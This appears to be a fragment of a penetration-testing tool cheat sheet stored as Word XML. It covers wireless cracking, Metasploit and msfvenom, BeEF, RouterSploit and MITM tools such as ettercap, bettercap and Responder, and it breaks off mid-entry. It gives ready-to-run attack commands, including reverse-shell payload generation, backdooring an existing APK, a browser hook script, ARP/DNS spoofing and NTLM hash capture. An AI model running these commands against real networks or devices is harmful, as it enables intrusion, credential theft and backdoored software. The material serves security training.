          <w:i/>
          <w:iCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">WiFi and wireless network security testing and attack tools.</w:t>
      </w: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Aircrack-ng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WEP/WPA Cracking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Complete 802.11 WEP and WPA/WPA2-PSK key cracking suite using captured IVs or 4-way handshakes.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aircrack-ng -b &lt;bssid&gt; &lt;capturefile&gt;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Perform a statistical WEP key recovery attack on IVs captured in the .cap file for the specified BSSID.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aircrack-ng -b AA:BB:CC:DD:EE:FF /home/kali/capture-01.cap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aircrack-ng -w &lt;wordlist&gt; -b &lt;bssid&gt; &lt;capturefile&gt;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 a dictionary attack against a captured WPA 4-way handshake. rockyou.txt is the standard starting wordlist.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aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF /home/kali/wpa_capture-01.cap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aircrack-ng -e "&lt;essid&gt;" -w &lt;wordlist&gt; &lt;capturefile&gt;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Identify the target network by its name (SSID) rather than MAC address.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aircrack-ng -e "HomeNetwork" -w /usr/share/wordlists/rockyou.txt /home/kali/capture-01.cap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aircrack-ng &lt;capturefile&gt;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 all detected APs and clients in the capture file along with the number of IVs and whether a WPA handshake is present.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aircrack-ng /home/kali/capture-01.cap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aircrack-ng -w &lt;wordlist&gt; -b &lt;bssid&gt; *.cap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Combine multiple capture files using a wildcard. Useful when captures have been split or taken across multiple sessions.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aircrack-ng -w /usr/share/wordlists/rockyou.txt -b AA:BB:CC:DD:EE:FF /home/kali/captures/*.cap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aircrack-ng -z &lt;pmkid_file&gt; &lt;wordlist&gt;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Crack a PMKID hash obtained with hcxdumptool/hcxtools without needing a full 4-way handshake.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aircrack-ng -z /home/kali/pmkid.16800 /usr/share/wordlists/rockyou.txt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-b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BSSID (AP MAC address) to target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ESSID (network name) to target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-w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Path to wordlist for WPA dictionary attack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-z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 PMKID attack mode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-K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 Korek WEP attack (older, slower)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Recover WEP keys from captured IV-rich pcap files during wireless assessments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Crack WPA2-PSK from a 4-way handshake captured via airodump-ng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Verify wireless password strength as part of a wireless security audit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Combine with hashcat (-m 22000) for GPU-accelerated WPA cracking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Airmon-ng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Wireless Utilities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Utility to enable and disable monitor mode on wireless interfaces and kill processes that interfere with packet capture.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airmon-ng check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 all processes that may interfere with monitor mode or packet injection (e.g., NetworkManager, wpa_supplicant).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airmon-ng check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airmon-ng check kill &amp;&amp; airmon-ng start &lt;interface&gt;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Stop all interfering processes and then enable monitor mode on the specified wireless interface.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airmon-ng check kill &amp;&amp; airmon-ng start wlan0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airmon-ng start &lt;interface&gt; &lt;channel&gt;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Enable monitor mode locked to a specific 802.11 channel. Useful when you already know the target AP channel.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airmon-ng start wlan0 6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airmon-ng stop &lt;monitor_interface&gt;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Disable monitor mode and return the interface to managed mode.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airmon-ng stop wlan0mon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Enable monitor mode on a wireless adapter as the first step of a wireless pentest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Kill interfering processes to prevent disruption during packet capture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Set up a specific channel to target a known access point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Restore managed mode after completing a wireless assessment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Airodump-ng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Wireless Capture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Raw 802.11 packet capture tool that lists nearby access points and associated clients, and saves frames to pcap files.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airodump-ng &lt;monitor_interface&gt;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Start scanning all 2.4 GHz channels in sequence, displaying discovered APs and associated clients. Press Ctrl+C to stop.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airodump-ng wlan0mon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airodump-ng -c &lt;channel&gt; --bssid &lt;bssid&gt; -w &lt;prefix&gt; &lt;interface&gt;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Focus on a single AP by locking the channel and filtering by BSSID. Write all captured frames to files prefixed with the given name.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airodump-ng -c 6 --bssid AA:BB:CC:DD:EE:FF -w /home/kali/wpa_capture wlan0mon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airodump-ng -c &lt;channel&gt; --bssid &lt;bssid&gt; -w &lt;prefix&gt; &lt;interface&gt;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 a targeted capture waiting for a WPA handshake. Use aireplay-ng deauth in a separate terminal to force clients to reconnect and trigger the handshake.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airodump-ng -c 11 --bssid AA:BB:CC:DD:EE:FF -w /home/kali/handshake wlan0mon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airodump-ng --band a -c &lt;channel&gt; -w &lt;prefix&gt; &lt;interface&gt;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Scan the 5 GHz band. Requires a wireless adapter that supports 5 GHz monitor mode.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airodump-ng --band a -c 36 --bssid AA:BB:CC:DD:EE:FF -w /home/kali/5ghz_capture wlan0mon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-c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Lock to a specific channel (avoids channel hopping)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--bssid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Filter capture to a single AP MAC address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-w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Write captured frames to files with this prefix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--ivs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Save only IVs to reduce file size (WEP attacks)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Filter display to a specific AP (same as --bssid for display)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 target wireless networks and their operating channels before an attack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Capture WPA 4-way handshakes for offline password cracking with aircrack-ng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Collect WEP IVs using the --ivs flag for statistical WEP cracking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Discover all clients associated with a target AP for targeted deauthentication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Aireplay-ng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Wireless Injection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Wireless packet injection and replay tool used to generate traffic for WEP cracking and force WPA handshake captures.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aireplay-ng -0 &lt;count&gt; -a &lt;ap_bssid&gt; -c &lt;client_mac&gt; &lt;interface&gt;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Send deauthentication frames to disconnect a specific client from the AP, forcing a WPA handshake on reconnect. Use count=0 for continuous deauth.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aireplay-ng -0 10 -a AA:BB:CC:DD:EE:FF -c CC:DD:EE:FF:00:11 wlan0mon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aireplay-ng -1 0 -a &lt;ap_bssid&gt; -h &lt;your_mac&gt; &lt;interface&gt;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Associate with a WEP access point using a fake authentication. Necessary before ARP replay to establish an association.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aireplay-ng -1 0 -a AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon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aireplay-ng -3 -b &lt;ap_bssid&gt; -h &lt;your_mac&gt; &lt;interface&gt;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Capture ARP requests and replay them at high speed to force the AP to generate new IVs, dramatically accelerating WEP cracking.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aireplay-ng -3 -b AA:BB:CC:DD:EE:FF -h 00:11:22:33:44:55 wlan0mon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aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b &lt;bssid&gt; &lt;interface&gt;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Interactively select and replay a captured packet. Can be used to replay specific frames from a .cap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aireplay-ng -2 -p 0841 -c FF:FF:FF:FF:FF:FF -b AA:BB:CC:DD:EE:FF wlan0mon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-0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Deauthentication attack; specify number of deauth frames (0 = infinite)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-1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Fake authentication; associate with AP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-3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ARP request replay attack for WEP IV generation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-6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Café-Latte attack targeting WEP clients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-a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Access point BSSID (MAC address)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-c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Target client MAC address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Target network ESSID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Force WPA handshake capture by deauthenticating connected clients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Accelerate WEP IV collection using ARP replay to crack keys faster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Associate with WEP networks as a prerequisite for ARP replay attacks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Test wireless IDS/IPS detection of deauthentication frame injection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Wifite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Automated Wireless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Automated wireless auditing tool that combines aircrack-ng suite tools into a single workflow for attacking WEP, WPA, and WPS networks.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wifite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Scan for all nearby wireless networks and prompt the user to select targets. Attempts all applicable attack methods automatically.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wifite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wifite --wps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Limit attacks to networks with WPS enabled, attempting PIN brute-force and pixie-dust attacks.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wifite --wps --bssid AA:BB:CC:DD:EE:FF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wifite --dict &lt;wordlist&gt;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 WPA handshake captures and crack them using the specified dictionary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wifite --dict /usr/share/wordlists/rockyou.txt --wpa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--wpa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Only attack WPA-encrypted networks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--wep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Only attack WEP-encrypted networks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--wps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Only attack networks with WPS enabled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--dict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Path to wordlist for WPA cracking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--bssid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Attack only this specific BSSID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--kill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Kill interfering processes before starting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--no-wps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Skip WPS attacks entirely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Rapid automated wireless assessment during a physical penetration test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Demonstrate wireless exposure to clients without deep aircrack-ng knowledge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Survey an estate for WPS-enabled routers vulnerable to pixie-dust attacks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Capture and crack WPA handshakes across multiple target networks in one session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Reaver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WPS Attacks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WPS PIN brute-force tool that exploits a design flaw in the Wi-Fi Protected Setup protocol to recover the WPA/WPA2 passphrase.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reaver -i &lt;interface&gt; -b &lt;bssid&gt; -vv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Start a WPS PIN brute-force attack against the target AP. -vv provides verbose progress output.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reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv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reaver -i &lt;interface&gt; -b &lt;bssid&gt; -vv -d &lt;delay&gt;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Add a delay between PIN attempts to circumvent rate-limiting or temporary lockout on the AP.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reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv -d 3 -t 5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reaver -i &lt;interface&gt; -b &lt;bssid&gt; -vv --no-nacks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Disable NACK messages to improve reliability against certain AP firmware implementations.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reaver -i wlan0mon -b AA:BB:CC:DD:EE:FF -vv --no-nacks -d 2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-i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Monitor mode interface to use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-b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BSSID of the target access point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-vv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Extra verbose output — show each PIN attempt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Delay in seconds between PIN attempts (reduces lockout risk)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Per-attempt timeout in seconds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Supply a known PIN to skip brute-force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--no-nacks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Do not send NACK messages on receive timeouts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Recover WPA/WPA2 passphrase from WPS-enabled routers during wireless audits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Demonstrate WPS vulnerability to clients as part of a wireless security review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Test whether client-facing routers have WPS lockout policies properly configured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Kismet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Wireless Reconnaissance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Wireless network detector, sniffer, and intrusion detection system supporting 802.11, Bluetooth, and other RF protocols.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kismet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Launch Kismet. It will detect available wireless interfaces and start the web server. Access the interface at http://localhost:2501 in a browser.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kismet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kismet -c &lt;interface&gt;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Start Kismet and specify which wireless interface to use as the capture source. Kismet will automatically enable monitor mode.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kismet -c wlan0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kismet -c &lt;interface&gt; --no-ncurses-wrapper --daemonize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 Kismet as a background daemon without the terminal UI. Captures are saved automatically to ~/.kismet/ in .kismet and .pcap formats.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kismet -c wlan0 --no-ncurses-wrapper --daemonize --log-prefix /home/kali/kismet_logs/survey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Passive wireless reconnaissance to map all APs and clients in an area without transmitting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Wardiving surveys to document wireless exposure across a geographic area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Detect rogue access points and deauthentication attacks on a protected network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Capture complete 802.11 frame sets for offline analysis in Wireshark</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="22c55e"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploitation Tools</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="thick" w:color="22c55e" w:sz="12" w:space="6"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="f3f4f6" w:val="clear"/>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Exploit frameworks and tools for compromising vulnerable systems.</w:t>
      </w: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Metasploit Framework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Exploit Frameworks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The world's most widely used penetration testing framework, providing a curated database of exploits, payloads, and auxiliary modules for comprehensive security assessments.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msfconsole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Launches the interactive Metasploit console. Use -q to suppress the banner for faster startup in scripts.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msfconsole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search type:exploit platform:windows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Searches the module database by type, platform, CVE, name, or author. Combine multiple filters to narrow results.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search type:exploit platform:windows name:smb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use exploit/windows/smb/ms17_010_eternalblue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Loads the specified module into context so its options become configurable. The full module path must be used.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use exploit/windows/smb/ms17_010_eternalblue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show options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Displays all configurable options for the currently loaded module, marking required fields and showing current values.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show options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set RHOSTS &lt;target&gt;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Sets the remote target. Accepts a single IP, a CIDR range, or a file path prefixed with "file:".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set RHOSTS 192.168.1.50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set payload windows/x64/meterpreter/reverse_tcp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Selects the payload to be delivered upon successful exploitation. The payload architecture must match the target.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set payload windows/x64/meterpreter/reverse_tcp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set LHOST &lt;attacker-ip&gt;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Sets the attacker's IP address that the target will call back to for reverse payloads.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set LHOST 192.168.1.100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run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Executes the loaded module with all configured options. "exploit" is an alias. Append -j to run as a background job.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run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sessions -l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Lists all active sessions. Use -i &lt;id&gt; to interact with a session, -k &lt;id&gt; to kill it, or -u &lt;id&gt; to upgrade a shell to Meterpreter.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sessions -l
sessions -i 1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background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Sends the active Meterpreter or shell session to the background so you can use the msfconsole prompt without closing the connection.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background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RHOSTS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Remote target IP, range, or hostname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TARGET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Specific target index when the module supports multiple target types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PAYLOAD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Full payload path, e.g. windows/x64/meterpreter/reverse_tcp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LHOST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Attacker IP or hostname for reverse-connection payloads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LPORT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Listening port for the reverse connection (default 4444)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VERBOSE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Enable detailed module output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 all open sessions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-i &lt;id&gt;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Interact with session by ID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-k &lt;id&gt;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Kill a session by ID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-u &lt;id&gt;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Upgrade a basic shell session to Meterpreter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Exploiting known CVEs against unpatched network services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Delivering post-exploitation payloads after initial access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Automating vulnerability validation in internal pen tests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Building and catching reverse shells during red-team exercises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Pivoting through compromised hosts to reach isolated network segments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Msfvenom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Payload Generation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Metasploit's standalone payload generator and encoder that creates shellcode, executables, and malicious APKs for use in penetration tests.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msfvenom --list payloads | grep &lt;filter&gt;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Displays all built-in payloads. Pipe through grep to filter by platform, arch, or connection type.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msfvenom --list payloads | grep android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msfvenom -p android/meterpreter/reverse_tcp LHOST=&lt;ip&gt; LPORT=&lt;port&gt; -o &lt;output.apk&gt;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Creates a standalone Android APK that opens a Meterpreter reverse TCP session back to the attacker when installed and launched on the target device.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msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -o evil.apk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msfvenom -p windows/meterpreter/reverse_tcp LHOST=&lt;ip&gt; LPORT=&lt;port&gt; -f exe -o &lt;output.exe&gt;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Produces a Windows PE executable that initiates a Meterpreter reverse TCP connection to the attacker.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msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f exe -o shell.exe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msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=&lt;ip&gt; LPORT=&lt;port&gt; -f elf -o &lt;output.elf&gt;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Creates a Linux ELF executable for x86 systems that calls back to the attacker with a Meterpreter session.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msfvenom -p linux/x86/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f elf -o shell.elf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msfvenom -p php/meterpreter/reverse_tcp LHOST=&lt;ip&gt; LPORT=&lt;port&gt; -f raw -o &lt;output.php&gt;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Creates a PHP script that, when placed on a web server and requested by a browser, opens a Meterpreter session back to the attacker.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msfvenom -p php/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -f raw -o shell.php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msfvenom -p android/meterpreter/reverse_tcp LHOST=&lt;ip&gt; LPORT=&lt;port&gt; -x &lt;original.apk&gt; -o &lt;embedded.apk&gt;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Injects a Meterpreter payload into an existing APK template. The resulting APK retains the original app's functionality while silently opening a backdoor.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msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.100 LPORT=4444 -x original.apk -o embedded.apk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msfvenom --list encoders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Lists all payload encoders with their reliability ratings. Use encoders with the -e flag to obfuscate shellcode.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msfvenom --list encoders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Payload name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-o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Output file path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-f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Output format (exe, elf, raw, dll, asp, etc.)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-x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Path to an existing APK/EXE to use as the payload template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Encoder to use, e.g. x86/shikata_ga_nai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-i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Number of encoding iterations to apply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-b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Bad characters to avoid in the payload bytes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Generating cross-platform reverse shells for penetration tests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Creating Android APKs to test mobile device management controls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Producing encoded payloads to evaluate AV evasion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Embedding backdoors in legitimate application templates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Generating shellcode for buffer-overflow exploit development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Searchsploit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Exploit Search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Command-line search utility for the Exploit-DB archive that lets you find and copy public exploits while completely offline.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searchsploit &lt;product&gt; &lt;version&gt;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Searches the local Exploit-DB copy for any exploits matching the given product name and optional version string.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searchsploit apache 2.4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searchsploit --cve &lt;CVE-ID&gt;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Looks up exploits associated with a specific CVE identifier. Useful when you already know the vulnerability from a scanner report.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searchsploit --cve 2021-44228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searchsploit -m &lt;exploit-id&gt;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Mirrors (copies) the exploit file identified by its Exploit-DB ID into the current directory so you can edit and run it without touching the original archive.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searchsploit -m 44228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searchsploit --update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Pulls the latest exploits from Exploit-DB and refreshes the local cache. Requires an internet connection.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searchsploit --update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Search only in the exploit title rather than the full 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-w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 the Exploit-DB web URL alongside each result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 the full path of a matched exploit file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-m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Mirror (copy) the exploit to the current directory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-x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Examine (print) the exploit source in the terminal without copying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Quickly finding public exploits for vulnerabilities found during network scans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Working with Exploit-DB in air-gapped or offline environments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Pulling exploit source code as a starting point for custom modifications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Cross-referencing CVE numbers with known proof-of-concept code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BeEF XSS Framework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Browser Exploitation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Browser Exploitation Framework that hooks victim browsers via a JavaScript payload and provides a real-time control panel for launching client-side attacks.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cd /usr/share/beef-xss &amp;&amp; ./beef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Launches the BeEF server. On first run it prompts you to change the default credentials. The API and UI ports are configured in config.yaml.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cd /usr/share/beef-xss &amp;&amp; ./beef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firefox http://192.168.1.100:3000/ui/panel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Opens the BeEF web UI in a browser. Log in with the credentials set during first run. The dashboard shows all currently hooked browsers.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firefox http://192.168.1.100:3000/ui/panel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&lt;script src="http://192.168.1.100:3000/hook.js"&gt;&lt;/script&gt;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The JavaScript snippet that must be loaded by the victim's browser. It can be injected via a reflected/stored XSS vulnerability, a cloned phishing page, or a MITM proxy.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&lt;script src="http://192.168.1.100:3000/hook.js"&gt;&lt;/script&gt;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curl -s -H "Content-Type: application/json" -d '{"text":"Test"}' "http://192.168.1.100:3000/api/modules/&lt;session&gt;/alert_dialog/run?token=&lt;api-token&gt;"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Automates BeEF module execution against a hooked session through the REST API. Useful for scripting attack chains without interacting with the web UI.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curl -s -H "Content-Type: application/json" -d '{"text":"Security Test"}' "http://192.168.1.100:3000/api/modules/abc123/alert_dialog/run?token=myapitoken"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Demonstrating the impact of stored XSS vulnerabilities to clients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Harvesting credentials through browser-based social engineering dialogs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Performing network discovery from inside the victim's browser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Chaining XSS with browser exploitation during web application assessments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RouterSploit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Embedded Device Exploitation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Open-source exploitation framework dedicated to embedded devices — routers, cameras, and IoT hardware — with built-in scanners and CVE-mapped exploits.</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="40" w:after="20"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Install: </w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="single" w:color="d1d5db" w:sz="4" w:space="4"/>
          <w:bottom w:val="single" w:color="d1d5db" w:sz="4" w:space="4"/>
          <w:left w:val="thick" w:color="22c55e" w:sz="12" w:space="4"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="f1f5f9" w:val="clear"/>
        <w:spacing w:before="80" w:after="80"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:color w:val="1e293b"/>
          <w:sz w:val="18"/>
          <w:szCs w:val="18"/>
          <w:rFonts w:ascii="Courier New" w:cs="Courier New" w:eastAsia="Courier New" w:hAnsi="Courier New"/>
        </w:rPr>
        <w:t xml:space="preserve">pip3 install routersploit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rsf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Starts the RouterSploit interactive console (rsf.py). The prompt changes to rsf &gt; and tab-completion is available for all module paths.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rsf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use scanners/routers/router_scan
set target 192.168.1.1
run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Loads the generic router scanner and tests the target against all known router exploits in the database. Vulnerable modules are highlighted in the results.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use scanners/routers/router_scan
set target 192.168.1.1
run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use exploits/routers/&lt;vendor&gt;/&lt;exploit_name&gt;
set target 192.168.1.1
run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Loads a vendor-specific exploit module, sets the target, and runs it. Check "show options" to confirm all required options are set.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use exploits/routers/netgear/multi_rce
set target 192.168.1.1
run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Assessing the security posture of routers and IoT devices on a network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Identifying unpatched firmware vulnerabilities during internal audits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Demonstrating default-credential risks on SOHO networking equipment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Testing camera and NAS device exposure in IoT security reviews</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:spacing w:before="80" w:after="40"/>
      </w:pPr>
    </w:p>
    <w:p>
      <w:r>
        <w:br w:type="page"/>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pStyle w:val="Heading1"/>
        <w:spacing w:before="200" w:after="120"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:b/>
          <w:bCs/>
          <w:color w:val="22c55e"/>
          <w:sz w:val="36"/>
          <w:szCs w:val="36"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Sniffing &amp; Spoofing</w:t>
      </w:r>
    </w:p>
    <w:p>
      <w:pPr>
        <w:pBdr>
          <w:top w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:bottom w:val="none" w:color="FFFFFF" w:sz="0"/>
          <w:left w:val="thick" w:color="22c55e" w:sz="12" w:space="6"/>
          <w:right w:val="none" w:color="FFFFFF" w:sz="0"/>
        </w:pBdr>
        <w:shd w:fill="f3f4f6" w:val="clear"/>
        <w:spacing w:before="0" w:after="160"/>
      </w:pPr>
      <w:r>
        <w:rPr>
          <w:i/>
          <w:iCs/>
          <w:color w:val="374151"/>
          <w:sz w:val="20"/>
          <w:szCs w:val="20"/>
          <w:rFonts w:ascii="Calibri" w:cs="Calibri" w:eastAsia="Calibri" w:hAnsi="Calibri"/>
        </w:rPr>
        <w:t xml:space="preserve">Network traffic capture, analysis, and man-in-the-middle attack tools.</w:t>
      </w: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Wireshark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Packet Analysis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The world's most popular graphical network protocol analyser, capable of capturing and deeply inspecting hundreds of protocols in real time.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wireshark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Opens the graphical interface. Select an interface from the welcome screen to begin live capture, or open an existing pcap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wireshark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wireshark -i &lt;interface&gt;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Starts Wireshark and immediately begins a live capture on the specified interface, bypassing the welcome screen.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wireshark -i eth0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wireshark -i &lt;interface&gt; -f "&lt;bpf-filter&gt;"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Applies a Berkeley Packet Filter at capture time to reduce the volume of traffic saved. Capture filters use tcpdump/BPF syntax.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wireshark -i eth0 -f "tcp port 80"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wireshark &lt;file.pcap&gt;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Opens a previously saved capture file for offline analysis. Wireshark supports pcap, pcapng, and many other formats.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wireshark capture.pcap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tshark -i &lt;interface&gt; -f "&lt;bpf-filter&gt;" -w &lt;output.pcap&gt;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Uses the headless tshark utility to capture packets from the command line. Ideal for remote servers or automated pipelines. Display filters (-Y) can be applied when reading back the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tshark -i eth0 -f "host 192.168.1.50" -w output.pcap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http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 filter: show only HTTP traffic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tcp.port == 443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 filter: show traffic on TCP port 443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ip.addr == 192.168.1.50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 filter: show traffic to/from specific IP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http.request.method == "POST"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 filter: show HTTP POST requests only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dns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 filter: show only DNS packets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ftp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 filter: show only FTP control traffic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Capturing and analysing cleartext credentials transmitted over HTTP or FTP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Debugging network applications by examining protocol exchanges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Performing post-incident forensics on captured network traffic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Analysing malware C2 communication patterns from sandbox captures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Verifying that encryption is properly applied to sensitive traffic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Tcpdump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Packet Capture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The classic command-line packet analyser that captures network traffic matching BPF filters and saves or displays it in real time.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tcpdump -i &lt;interface&gt;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Begins capturing all packets on the specified interface and prints abbreviated packet headers to stdout.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tcpdump -i eth0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tcpdump -i &lt;interface&gt; host &lt;ip&gt;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Captures only packets whose source or destination IP matches the given address.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tcpdump -i eth0 host 192.168.1.50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tcpdump -i &lt;interface&gt; port &lt;port&gt;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Captures only traffic on the specified TCP or UDP port. Combine with "and" for compound filters.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tcpdump -i eth0 port 80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tcpdump -i &lt;interface&gt; -w &lt;output.pcap&gt;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Saves raw captured packets to a pcap file for later analysis in Wireshark or other tools.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tcpdump -i eth0 -w capture.pcap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tcpdump -r &lt;capture.pcap&gt;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Reads and displays packets from a previously saved capture file. All filter expressions still apply.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tcpdump -r capture.pcap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tcpdump -i &lt;interface&gt; -A -s 0 port 80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Captures HTTP traffic and prints the full packet payload in ASCII, making cleartext credentials and request bodies visible in the terminal.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tcpdump -i eth0 -A -s 0 port 80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-i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Network interface to capture on (use "any" for all interfaces)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Disable DNS resolution — show raw IP addresses instead of hostnames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-v/-vv/-vvv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Increase verbosity level of packet output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-w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Write raw packets to a pcap file instead of printing to stdout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-r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Read packets from a saved pcap file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-c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Exit after capturing the specified number of packets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-A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 packet payload in ASCII (useful for cleartext protocols)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-x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 packet payload in hexadecimal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Snapshot length — use 0 to capture the entire packet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-q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Quiet mode: less protocol information per packet line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Capturing traffic on remote servers over SSH without a GUI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Writing pcap files for later analysis in Wireshark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Debugging network connectivity issues at the packet level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Monitoring cleartext protocols like HTTP, FTP, and Telnet for credentials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Generating traffic samples for IDS signature testing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Ettercap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MITM Attack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Comprehensive man-in-the-middle attack suite supporting ARP poisoning, DNS spoofing, and live connection modification with both GUI and text modes.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ettercap -G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Opens the GTK graphical interface. Use the Sniff menu to select an interface, then Hosts &gt; Scan for Hosts, and finally MITM &gt; ARP Poisoning.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ettercap -G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ettercap -T -q -i &lt;interface&gt; -M arp /192.168.1.1// /192.168.1.50//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Runs Ettercap in text mode, performing ARP poisoning between the gateway (192.168.1.1) and the victim (192.168.1.50). All traffic between them is intercepted.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ettercap -T -q -i eth0 -M arp /192.168.1.1// /192.168.1.50//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ettercap --list-plugins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Displays all installed Ettercap plugins including dns_spoof, autoadd, chk_poison, and others.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ettercap --list-plugins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ettercap -T -q -i &lt;interface&gt; -M arp -P dns_spoof /192.168.1.1// /192.168.1.50//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Combines ARP poisoning with the dns_spoof plugin to redirect DNS queries from the victim to attacker-controlled IPs. Edit /etc/ettercap/etter.dns to set spoofed entries.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ettercap -T -q -i eth0 -M arp -P dns_spoof /192.168.1.1// /192.168.1.50//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 the GTK graphical user interface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 text-only (terminal) mode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-q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Quiet mode — suppress verbose packet output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-i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Network interface to use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-M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MITM attack method (arp, icmp, dhcp, port)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-w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Write sniffed packets to a pcap file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Load a plugin, e.g. -P dns_spoof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Intercepting cleartext credentials on local network segments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Demonstrating ARP spoofing risks to network security teams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Performing DNS spoofing to redirect victims to phishing pages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Analysing unencrypted protocol traffic during internal assessments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Bettercap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MITM Attack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Modern, modular MITM framework with a real-time web UI and interactive REPL that supports ARP/ND spoofing, HTTP/S proxying, Wi-Fi attacks, and BLE sniffing.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bettercap -iface &lt;interface&gt;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Launches the interactive Bettercap REPL bound to the specified network interface.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bettercap -iface eth0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net.probe on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Activates the network probe module, which sends ARP, mDNS, and NBNS probes to discover all live hosts on the local subnet. Results appear in the hosts table.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net.probe on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set arp.spoof.targets 192.168.1.50; arp.spoof on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Configures the ARP spoofing module to target a specific IP and enables it. The gateway's MAC is also poisoned so the attack is bidirectional.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set arp.spoof.targets 192.168.1.50
arp.spoof on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http.proxy on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Starts the transparent HTTP proxy to intercept, log, and optionally modify cleartext HTTP requests and responses from spoofed targets.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http.proxy on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net.sniff on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Enables the packet sniffer module which automatically extracts and logs credentials, cookies, and interesting data from intercepted traffic.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net.sniff on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Performing ARP spoofing and credential sniffing on LAN segments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Intercepting and modifying HTTP/S traffic with proxy modules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Wi-Fi reconnaissance and client deauthentication attacks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Automating attack chains with caplet scripts for red-team engagements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Responder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Credential Capture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LLMNR, NBT-NS, and MDNS poisoner that captures NTLMv1/v2 challenge-response hashes from Windows machines that broadcast name resolution queries.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responder -I &lt;interface&gt; -rdwv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Activates Responder with NBNS (-r), DHCP (-d), and WPAD (-w) poisoning enabled in verbose mode. Captured hashes are written to /usr/share/responder/logs/.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responder -I eth0 -rdwv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responder -I &lt;interface&gt; -A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Passively listens for broadcast name-resolution queries without responding to them. Use this to map the network and detect responder-vulnerable clients without alerting defenders.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responder -I eth0 -A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cat /usr/share/responder/logs/SMB-NTLMv2-SSP-192.168.1.50.txt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Responder writes captured hashes to per-protocol log files named by protocol and source IP. Review these files to collect hashes for offline cracking.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cat /usr/share/responder/logs/SMB-NTLMv2-SSP-192.168.1.50.txt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-I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Network interface to listen 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-r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Activate NBNS poisoning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Activate DHCP rogue responses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-w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Start the WPAD rogue proxy server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-v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Verbose output showing all captured packets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-A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Analyze mode — listen only, do not send poisoned responses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Capturing NTLMv2 hashes on Windows Active Directory networks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Demonstrating the impact of default Windows name-resolution behaviour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Collecting credentials for password-spray or offline cracking campaigns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Mapping which hosts are susceptible to LLMNR/NBT-NS poisoning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Mitmproxy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HTTP Proxy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Interactive TLS-capable HTTP/S proxy that intercepts, inspects, modifies, and replays web traffic from both command-line and browser-based interfaces.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mitmproxy --listen-port &lt;port&gt;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Launches the terminal-based interactive interface on the specified port (default 8080). Configure the browser to use 127.0.0.1:&lt;port&gt; as an HTTP proxy.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mitmproxy --listen-port 8080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mitmweb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Launches mitmproxy with a web dashboard on http://127.0.0.1:8081. The web UI allows filtering, inspecting, and replaying flows from any browser.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mitmweb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mitmdump -w &lt;output.bin&gt;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Runs mitmproxy non-interactively, saving all flows to a binary file for later offline analysis or replay.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mitmdump -w output.bin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mitmproxy -s &lt;script.py&gt;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Loads a Python addon that hooks into request/response events to automate traffic modification, credential extraction, or fuzzing.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mitmproxy -s extract_cookies.py --listen-port 8080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--listen-port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Port to listen on (default 8080)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--ssl-insecure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Skip upstream TLS certificate verification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--mode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Proxy mode: regular (default), transparent, socks5, or reverse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-w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Write flows to a binary dump file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-r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Read and replay flows from a previously saved dump file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Load a Python addon/script for custom traffic manipulation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Intercepting and modifying mobile app API traffic for security testing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Extracting authentication tokens and cookies from HTTPS sessions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Fuzzing web API parameters by intercepting and modifying live requests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Recording and replaying traffic sequences for regression testing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Arpspoof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ARP Spoofing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Simple dsniff-suite utility that sends forged ARP replies to poison the ARP cache of a target host, enabling 